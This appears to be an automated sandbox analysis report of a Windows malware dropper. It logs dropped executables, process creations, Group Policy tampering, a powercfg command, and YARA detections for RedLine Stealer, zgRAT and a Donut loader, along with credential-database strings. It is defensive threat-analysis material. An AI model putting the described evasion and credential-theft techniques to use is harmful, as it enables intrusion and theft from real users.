Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: section name:

Uses powercfg.exe to modify the power settings

Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe

Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

Creates files inside the system directory

Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Windows\System32\GroupPolicy\gpt.ini	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Windows\System32\GroupPolicy\Machine	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Windows\System32\GroupPolicy\User	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Windows\System32\GroupPolicy\Machine\Registry.pol	Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_004E925D	7_2_004E925D
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00496450	7_2_00496450
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0040C490	7_2_0040C490
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0045A490	7_2_0045A490
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_004564A0	7_2_004564A0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0045B4B0	7_2_0045B4B0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00458520	7_2_00458520
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0043B750	7_2_0043B750
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00438770	7_2_00438770
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0043C800	7_2_0043C800
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_004378A0	7_2_004378A0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00442940	7_2_00442940
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00439A80	7_2_00439A80
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00434B20	7_2_00434B20
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0042EB90	7_2_0042EB90
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0045CC40	7_2_0045CC40
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0040BFC0	7_2_0040BFC0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0048E040	7_2_0048E040
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0044C160	7_2_0044C160
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00490100	7_2_00490100
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00487270	7_2_00487270
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0047F360	7_2_0047F360
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_004E03D0	7_2_004E03D0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00483470	7_2_00483470
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00402410	7_2_00402410
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_004944E0	7_2_004944E0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00416490	7_2_00416490
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_004E959F	7_2_004E959F
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00402600	7_2_00402600
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00472630	7_2_00472630
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00433740	7_2_00433740
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00470760	7_2_00470760
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0040E7B0	7_2_0040E7B0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0048F7B0	7_2_0048F7B0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_004FB84F	7_2_004FB84F
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00471830	7_2_00471830
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_004FD9FE	7_2_004FD9FE
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0041F9B0	7_2_0041F9B0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00481A30	7_2_00481A30
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_004E3B58	7_2_004E3B58
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0044EB90	7_2_0044EB90
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_004E5B90	7_2_004E5B90
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_004F6CC5	7_2_004F6CC5
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00490E40	7_2_00490E40
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0049EE70	7_2_0049EE70
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00418EE0	7_2_00418EE0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00483EF0	7_2_00483EF0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00482FE0	7_2_00482FE0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00493FF0	7_2_00493FF0

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\ProgramData\DDEReadline 2.22.66\DDEReadline 2.22.66.exe 4C5C6DEBE9453F0343F163AA72B7049F3167BC08D3B2D549FCABC4EE6BFBAFCD
Source: Joe Sandbox View	Dropped File: C:\ProgramData\MSIUpdaterV202_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV202.exe 491D7B93C49438AC2B97E8AD343B99ABBCC3536D9D32DE6972FF64A7EC32F858
Source: Joe Sandbox View	Dropped File: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe 0823C2F58D094E1C096AE9184ACF0B930DF6DFF97D0CD77728DC3FF07F9C0096

Found potential string decryption / allocating functions

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: String function: 0046A190 appears 47 times
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: String function: 00469F00 appears 32 times

PE file contains executable resources (Code or Archives)

Source: 060[1].exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: FCK5Px_iTbBaGQTFBpzZeks2.exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

PE file does not import any functions

Source: ydYqwUL3GNS6IHkMgIteny78.exe.0.dr

Static PE information: No import functions for PE file found

Yara signature match

Source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e2b000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e2b000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 23.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e00000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000017.00000002.3121845008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000009.00000002.2945966456.000001C57C0F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000F.00000002.3133986661.0000000003548000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000B.00000002.3128484009.0000000002D47000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000E.00000002.3133832345.000000000352A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: fiona[1].exe.0.dr	Static PE information: Section: ZLIB complexity 1.0003185711998293
Source: fiona[1].exe.0.dr	Static PE information: Section: ZLIB complexity 0.9937318313953488
Source: fiona[1].exe.0.dr	Static PE information: Section: ZLIB complexity 0.9921875
Source: fiona[1].exe.0.dr	Static PE information: Section: ZLIB complexity 1.0006510416666667
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: Section: ZLIB complexity 1.0003185711998293
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9937318313953488
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9921875
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: Section: ZLIB complexity 1.0006510416666667
Source: wDFs1SzoVQiT2__nQmbIm6Rg.exe.0.dr	Static PE information: Section: .Right ZLIB complexity 0.9981044138707038
Source: 9RJ0JeM9uj2rfsuq_woBmmIY.exe.0.dr	Static PE information: Section: .Shine ZLIB complexity 0.997067775974026

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@96/168@35/26

Source: C:\Users\user\Desktop\WlCIinu0yp.exe

File created: C:\Users\user\Documents\SimpleAdobe

Jump to behavior

Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Mutant created: \Sessions\1\BaseNamedObjects\IntelPowerExpert
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6040:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2504:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7268:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4504:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5328:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2212:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7456:120:WilError_03
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Mutant created: \Sessions\1\BaseNamedObjects\JarakHalgWW_12
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Protect544cd51a.dll
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe

File created: C:\Users\user\AppData\Local\Temp\adobeLgVUNbWj4Aw0

Jump to behavior

Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\WlCIinu0yp.exe

File read: C:\Windows\System32\GroupPolicy\gpt.ini

Jump to behavior

Source: C:\Users\user\Desktop\WlCIinu0yp.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2547218346.0000000000515000.00000002.00000001.01000000.00000006.sdmp, ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3123029988.0000000000901000.00000040.00000001.01000000.0000000C.sdmp, H14SDf_AWcPvvQK5Xx97sISX.exe, 00000010.00000002.3125680466.0000000000516000.00000002.00000001.01000000.00000011.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2538050137.0000000000515000.00000002.00000001.01000000.00000014.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2547218346.0000000000515000.00000002.00000001.01000000.00000006.sdmp, ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3123029988.0000000000901000.00000040.00000001.01000000.0000000C.sdmp, H14SDf_AWcPvvQK5Xx97sISX.exe, 00000010.00000002.3125680466.0000000000516000.00000002.00000001.01000000.00000011.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2538050137.0000000000515000.00000002.00000001.01000000.00000014.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2378404889.0000000005E6B000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2376894246.0000000005E6B000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2402256117.0000000005E6B000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2404583587.0000000005E6B000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2393772444.0000000005E6B000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2396510067.0000000005E6B000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2401953878.0000000005E6B000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2397894755.0000000005E6B000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2377471770.0000000005E6B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: WlCIinu0yp.exe	ReversingLabs: Detection: 57%
Source: WlCIinu0yp.exe	Virustotal: Detection: 66%

Source: hvkESMr10WtP7_E6btIJmDx0.exe

String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address

Source: unknown	Process created: C:\Users\user\Desktop\WlCIinu0yp.exe "C:\Users\user\Desktop\WlCIinu0yp.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\cX55WveNgznoE8Y_EKeykvl8.exe C:\Users\user\Documents\SimpleAdobe\cX55WveNgznoE8Y_EKeykvl8.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\njeL_S54LMD1B6b6sdXBUgG6.exe C:\Users\user\Documents\SimpleAdobe\njeL_S54LMD1B6b6sdXBUgG6.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\0kNDw1qtthM70owdcV01L1ro.exe C:\Users\user\Documents\SimpleAdobe\0kNDw1qtthM70owdcV01L1ro.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe
